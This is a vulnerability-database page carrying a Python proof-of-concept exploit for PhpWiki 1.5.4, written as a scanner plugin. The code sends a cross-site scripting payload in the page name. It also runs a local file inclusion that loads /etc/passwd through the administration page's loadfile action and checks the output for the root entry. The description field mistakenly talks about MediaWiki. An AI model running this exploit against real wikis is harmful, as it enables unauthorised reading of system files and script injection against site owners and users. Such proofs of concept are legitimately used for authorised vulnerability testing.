Vulners
Lucene search
PhpWiki 1.5.4 Cross Site Scripting / Local File Inclusion
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import re
from urlparse import urljoin
from lib.request.basic import req
from lib.core.poc import Output, POCBase
from lib.core.register import registerPoc as register
class TestPOC(POCBase):
vulID = '89298'
version = '1'
author = '隔壁老张'
vulDate = '2015-09-02'
createDate = '2015-09-02'
updateDate = '2015-09-05'
references = ['http://sebug.net/vuldb/ssvid-89298']
name = 'PhpWiki 1.5.4 Cross Site Scripting / Local File Inclusion'
appPowerLink = 'http://phpwiki.sourceforge.net/'
appName = 'PhpWiki'
appVersion = '1.5.4'
vulType = 'Cross Site Script'
desc = '''
MediaWiki全球最著名的开源wiki程序,运行于PHP+MySQL环境。
MediaWiki从2002年2月25日被作为维基百科全书的系统软件,
并有大量其他应用实例。目前MediaWiki的开发得到维基媒体基金会的支持。
'''
samples = ['']
def _verify_xss(self):
payload = 'phpwiki/index.php?pagename=<h1>XSS#TEST</h1>!--'
res = req.get(urljoin(self.url, payload), timeout=5)
return self.parse_verify(res, 'xss')
def _verify_lfi(self):
payload1 = 'phpwiki/index.php/PhpWikiAdministration'
data = 'action=loadfile&overwrite=&pagename=PhpWikiAdministration&source=/etc/passwd'
res1 = req.post(urljoin(self.url, payload1), data=data, timeout=5)
payload2 = 'phpwiki/index.php/passwd'
res2 = req.get(urljoin(self.url, payload2), headers={'Referer': urljoin(self.url, payload1)})
res = [res1, res2]
return self.parse_verify(res, 'lfi')
def _verify(self):
return self._verify_xss() or self._verify_lfi()
def _attack(self):
return self._verify()
def parse_verify(self ,response, type):
output = Output(self)
result = {}
if type == 'xss':
if response.status_code == 200 and '<h1>XSS#TEST</h1>' in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urljoin(self.url, 'phpwiki/index.php?pagename=<h1>XSS#TEST</h1>!--')
output.success(result)
elif type == 'lfi':
if response[0].status_code == response[1].status_code == 200:
pattern = re.compile('root:.+?:0:0:.+?:.+?:.+?')
if pattern.search(response[1].content):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urljoin(self.url, 'phpwiki/index.php/passwd')
output.success(result)
else:
output.fail('No vulnerability found')
return output
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Sep 2015 00:00Current
6.9Medium risk
Vulners AI Score6.9